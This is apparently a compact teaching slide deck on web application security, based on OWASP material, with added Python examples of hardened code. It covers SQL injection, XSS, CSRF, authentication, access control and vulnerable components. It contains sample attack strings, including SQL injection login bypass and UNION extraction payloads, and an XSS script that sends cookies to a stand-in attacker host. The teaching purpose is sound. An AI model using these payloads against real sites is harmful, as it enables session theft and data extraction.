Web Application Security

in a nutshell

An ultra-compact intro (or refresher)

Created by Björn Kimminich / @bkimminich


Famous last words...

“Nobody would bother to hack us.”
“Our Firewall, IDS and IPS will keep us safe.”
“We will add security to the system later.”
“What's the worst that could actually happen?”

Injection

Injection means...

...tricking an application into including unintended commands in the data sent to an interpreter.

Interpreter means...

...a program that takes a String and interprets it as a command.

Interpreters are used for...

  • SQL
  • HQL
  • OS Shell
  • LDAP
  • XPath
  • ...

Bypassing Authentication

with SQL Injection

// Vulnerable: request parameters are concatenated straight into the SQL text
String query = "SELECT id FROM users " +
               "WHERE name = '" + req.getParameter("username") + "' " +
               "AND password = '" + req.getParameter("password") + "'";
                        

The intended use case results in a query like this:


SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
                        

Attack Examples

on authentication queries

Disabling password check for a known username:


SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
                        

Logging in without even knowing a username:


SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
                        

Spying out Data

with SQL Injection

String query =
            "SELECT id,author,title,price FROM books " +
            "WHERE title LIKE '%" + req.getParameter("query") + "%'";
                        

The intended use case results in a query like this:


SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
                        

Attack Examples

on data retrieval queries

Probing for the right number of result set columns:


SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users--%'
                        

SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users--%'
                        

SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users--%'
                        

Using known column names to extract data:


SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users--%'
                            

Preventing Injection

  • Avoid Interpreters
  • Bind Variables
  • Prepared Statements
  • Least Privileges for app DB user
  • White List Input Validation
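
The page's authentication query next to its bound-variable form, as an added example (not part of the original slides). It uses Python with an in-memory SQLite database instead of the slides' Java so that it runs stand-alone; the table contents and all function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; plaintext passwords only mirror the page's query.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin-pw', 'admin@example.test');
        INSERT INTO users VALUES (2, 'bjoern', 'secret', 'bjoern@example.test');
        CREATE TABLE books (id INTEGER PRIMARY KEY, author TEXT, title TEXT, price REAL);
        INSERT INTO books VALUES (1, 'Sample Author', 'The Tangled Web', 39.95);
    """)
    return db

def login_concatenated(db, username, password):
    # Vulnerable: input is pasted into the SQL text, as in the page's Java query.
    query = ("SELECT id FROM users WHERE name = '" + username + "' "
             "AND password = '" + password + "'")
    return [row[0] for row in db.execute(query)]

def login_bound(db, username, password):
    # Hardened: placeholders send the values separately from the SQL grammar.
    query = "SELECT id FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in db.execute(query, (username, password))]

def search_bound(db, term):
    # LIKE wildcards are added to the bound value, never to the SQL string.
    query = "SELECT id,author,title,price FROM books WHERE title LIKE ?"
    return db.execute(query, ("%" + term + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Inputs taken from the "Attack Examples" slides above.
    for user in ("bjoern", "bjoern'--", "' or 1=1--"):
        print(repr(user), login_concatenated(db, user, "?"), login_bound(db, user, "?"))
```

With bound variables the quote and comment characters arrive as ordinary data, so both inputs from the attack slides match no user.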

Cross Site Scripting (XSS)

Malicious Code is sent...

...to an innocent user's browser through

  • a form field or URL (Reflected XSS)
  • a previously stored DB record (Persistent XSS)
  • a DOM element of a rich JS client (Local XSS)

Possible Damage from XSS

  • stolen user session
  • stolen sensitive data
  • rewriting web page
  • redirecting to malicious site

XSS Vulnerability Example


http://bookwo.rm/titles/search?keywords=raspberry%20pi
                        

The intended use case is to display the keywords above the results:


<%
String keywords = request.getParameter("keywords");
List<Book> results = titleSearchService.findByKeywords(keywords.split(" "));
%>
<%-- Vulnerable: keywords is echoed into the page without output encoding --%>
There are <%=results.size()%> results for your search by <em><%=keywords%></em>
<table>
    <% for (Book book : results) { %>
      <%-- render result as table rows --%>
    <% } %>
</table>
                        

XSS Attack Examples

Probing for XSS Vulnerability


<script>alert(1)</script>
                        

Stealing User Session


<script>
    new Image().src="http://my.evil-si.te/hijack.php?c="+encodeURI(document.cookie);
</script>
                        

Site Defacement


<script>document.body.background="http://my.evil-si.te/image.jpg";</script>
                        

Preventing XSS

  • Avoid including user supplied input into output
  • Output encode all user supplied input
  • Sanitize HTML where user supplied HTML is unavoidable
  • White List Input Validation
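
The search result line from the vulnerability example with output encoding applied, as an added example (not part of the original slides). It is written in Python rather than JSP so it runs stand-alone; the function names and the whitelist pattern are assumptions made for illustration.

```python
import html
import re
from urllib.parse import quote

# Assumed whitelist: letters, digits, spaces and a little punctuation, max 100 chars.
KEYWORDS_OK = re.compile(r"[\w .,'-]{1,100}")

def validate_keywords(keywords):
    # White list input validation: reject anything outside the expected alphabet.
    return KEYWORDS_OK.fullmatch(keywords) is not None

def render_unencoded(keywords, count):
    # Same flaw as the JSP above: raw request data lands in the markup.
    return f"There are {count} results for your search by <em>{keywords}</em>"

def render_encoded(keywords, count):
    # HTML body context: & < > " ' become entities, so the browser shows text.
    return (f"There are {count} results for your search by "
            f"<em>{html.escape(keywords, quote=True)}</em>")

def render_link(keywords):
    # URL inside an attribute: percent-encode the value, then HTML-encode the URL.
    href = "/titles/search?keywords=" + quote(keywords, safe="")
    return f'<a href="{html.escape(href, quote=True)}">repeat search</a>'

if __name__ == "__main__":
    probe = "<script>alert(1)</script>"  # the probe string from the slides
    print(validate_keywords(probe))
    print(render_unencoded(probe, 0))
    print(render_encoded(probe, 0))
    print(render_link(probe))
```

Validation and encoding are independent layers: the apostrophe passes the whitelist for legitimate titles, which is why the output is still encoded afterwards.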

Cross Site Request Forgery (CSRF)

A Victim's Browser...

...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request.

  • Session Cookie
  • Basic Authentication
  • Authorization HTTP Header
  • ...

CSRF Attack Examples

Preventing CSRF

  • Add a secret token to all sensitive requests
  • This token must not be automatically submitted
  • Require secondary authentication for sensitive functions
  • Beware exposing the token in a Referer HTTP header

Make sure your application has no XSS holes that could be exploited to attack others!
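
One way to implement the secret token from the list above, as an added example (not part of the original slides). It is a Python sketch with a hypothetical `handle_transfer` handler and an assumed server-side key; the token is bound to the session with an HMAC and is read from the request body only.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumption: secret that never leaves the server

def _mac(session_id, nonce):
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

def issue_csrf_token(session_id):
    # Random nonce plus a MAC that binds the token to one session.
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"

def csrf_token_valid(session_id, token):
    if not isinstance(token, str) or token.count(".") != 1:
        return False
    nonce, mac = token.split(".")
    # Compare as bytes in constant time; non-ASCII input must not raise.
    return hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())

def handle_transfer(session_cookie, form):
    # The cookie is attached by the browser automatically; the token is not.
    # It is read from the POST body, never from the URL, so it cannot leak
    # through a Referer header.
    if not csrf_token_valid(session_cookie, form.get("csrf_token")):
        return 403
    return 200

if __name__ == "__main__":
    sid = "constructed-session-1"  # constructed sample session id
    token = issue_csrf_token(sid)
    print(handle_transfer(sid, {"csrf_token": token}))  # legitimate form post
    print(handle_transfer(sid, {}))                     # forged cross-site request
```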

Broken Authentication

Typical Authentication Flaws

  • Allowing weak passwords
  • Storing SSL certificate insecurely
  • Credentials passed via insecure HTTP connection
  • Exposing session IDs in URLs, via unsafe networks, logs, ...

Side Channel Attack Vectors

  • Change Password
  • “Remember me”
  • Forgot Password
  • Secret Questions

Classical Broken Authentication...

...due to starting login process on unencrypted page

http://sick-cure-ba.nk/login.do
                    

POST /login.do HTTP/1.1
Host: sick-cure-ba.nk
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded

username=bjoern&password=secret
                    

Weak hashes put passwords at risk...

...as do unsalted strong hash algorithms

| id | username   | password |
|----|------------|----------|
| 1  | admin      | d033e22ae348aeb5660fc2140aec35850c4da997 |
| 2  | bjoern     | 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b |
| 3  | localhorst | 0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe464e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006 |

Cracking unsalted hashes with a Rainbow Table attack is fast, even though the last two of them might seem sufficiently secure given their 256- and 512-bit length. You can easily crack weak password hashes online, e.g. at CrackStation.

Securing Authentication

  • Centralize and standardize authentication
  • Protect credentials with SSL/TLS ¹
  • Use strong mechanisms with multiple factors
  • Do not store or log unencrypted credentials ²

¹ Serve an HSTS header from your site to protect against protocol downgrade attacks. Also consider applying to have your domain included in the HSTS preload list of Chromium.

² Use only brute-force resistant algorithms for password hashing, preferably Argon2, the winner of the Password Hashing Competition.
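
Why the unsalted hashes in the table fall to a precomputed lookup while salted, deliberately slow hashes do not, as an added example (not part of the original slides). Argon2 is not in Python's standard library, so this sketch substitutes `hashlib.scrypt` as a memory-hard stand-in; the cost parameters, storage format and function names are assumptions.

```python
import hashlib
import hmac
import os

N, R, P = 2**14, 8, 1  # assumed scrypt cost parameters for this example

def unsalted_sha256(password):
    # The weak scheme from the table above: same password, same hash, for every user.
    return hashlib.sha256(password.encode()).hexdigest()

def precomputed_lookup(hashes, wordlist):
    # One table built once reverses every unsalted hash whose password is in the list.
    table = {unsalted_sha256(word): word for word in wordlist}
    return {user: table[h] for user, h in hashes.items() if h in table}

def _scrypt(password, salt, n, r, p):
    return hashlib.scrypt(password.encode(), salt=salt, n=n, r=r, p=p,
                          maxmem=64 * 1024 * 1024, dklen=32)

def hash_password(password):
    salt = os.urandom(16)  # unique per credential, stored next to the hash
    return "$".join(["scrypt", str(N), str(R), str(P),
                     salt.hex(), _scrypt(password, salt, N, R, P).hex()])

def verify_password(password, stored):
    try:
        scheme, n, r, p, salt_hex, digest_hex = stored.split("$")
        if scheme != "scrypt":
            return False
        expected = bytes.fromhex(digest_hex)
        actual = _scrypt(password, bytes.fromhex(salt_hex), int(n), int(r), int(p))
    except ValueError:
        return False  # malformed record: reject instead of raising
    return hmac.compare_digest(actual, expected)

if __name__ == "__main__":
    # Constructed accounts: two users share one password.
    weak = {"alice": unsalted_sha256("secret"), "bob": unsalted_sha256("secret")}
    print(precomputed_lookup(weak, ["123456", "secret"]))
    print(hash_password("secret") != hash_password("secret"))  # salts differ
```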

Broken Access Control

Common Authorization Mistakes

  • Hiding object references instead of restricting access
  • Displaying only authorized links and menu choices
  • Trusting client-side access control mechanisms
  • Lack of server-side verification of user privileges

Request Tampering for Privilege Escalation...

...and finding all kinds of Access Control Issues

http://logistics-worldwi.de/showShipment?id=40643108
                        

http://my-universi.ty/api/students/6503/exams/view
                        

http://document-warehou.se/landingpage?content=index.html
                        

Securing Access Control

  • Never rely on “Security by obscurity”
  • Replace direct object references with temporary mappings
  • Restrict data and functionality access to authorized users
  • Enforce user or role based permissions
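
A server-side ownership check and a temporary per-session reference map for the shipment URL shown above, as an added example (not part of the original slides). The records, user names and all function and class names are constructed for illustration; it is written in Python so it runs stand-alone.

```python
import secrets

# Constructed records; the first id is the one from the page's example URL.
SHIPMENTS = {
    40643108: {"owner": "bjoern", "status": "in transit"},
    40643109: {"owner": "alice", "status": "delivered"},
}

class Forbidden(Exception):
    """Raised for missing and foreign objects alike, so ids cannot be probed."""

def show_shipment_unchecked(user, shipment_id):
    # Flawed: any logged-in user who edits ?id= gets the record.
    return SHIPMENTS[shipment_id]

def show_shipment(user, shipment_id):
    # Server-side check on every request, independent of which links were shown.
    shipment = SHIPMENTS.get(shipment_id)
    if shipment is None or shipment["owner"] != user:
        raise Forbidden(shipment_id)
    return shipment

class SessionReferences:
    """Temporary per-session mapping from random references to real ids."""

    def __init__(self, user):
        self.user = user
        self._refs = {}

    def reference_for(self, shipment_id):
        show_shipment(self.user, shipment_id)  # only map what the user may see
        ref = secrets.token_urlsafe(8)
        self._refs[ref] = shipment_id
        return ref

    def resolve(self, ref):
        if ref not in self._refs:
            raise Forbidden(ref)
        return show_shipment(self.user, self._refs[ref])  # re-check on use
```

The mapping hides real identifiers, but the ownership check in `show_shipment` is what enforces access; the map alone would be obscurity.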

Broken Environment

Possible Environmental Vulnerabilities

  • Software Libraries
  • Application Server
  • Web Server
  • Operating System
  • ...

Known Vulnerability Examples

| Component | Vulnerability | Affected |
|-----------|---------------|----------|
| OpenSSL | Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read (Heartbleed) | 1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1 |
| Unix Bash | Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system (Shellshock) | CGI, OpenSSH, DHCP, QMail, ... |
| Struts | Remote manipulation of the ClassLoader via the class parameter, which is passed to the getClass() method | before 2.3.16.1 |
| Struts | Wildcard cookiesName does not properly restrict access to the getClass() method, which allows ClassLoader manipulation | before 2.3.16.2 |

Protection from Environmental Vulnerabilities

  • Monitor security of used components
  • Keep up with patches for used components
  • Remove unnecessary stuff on all levels
  • Restrict use of unapproved components

Java and .NET project dependencies can be monitored by OWASP Dependency Check, which relies on the NIST National Vulnerability Database. For JavaScript and Node.js modules there is Retire.js, which is updated manually via its GitHub project. Both tools integrate well with typical software build processes.

Q&A

Credits

Presentation created with reveal.js

The HTML Presentation Framework

Based on free material provided by OWASP

The Open Web Application Security Project

Background image based on Digital Shodan

by sephiroth-kmfdm

THE END

by Björn Kimminich / kimminich.de

These slides are publicly available on GitHub and Slideshare.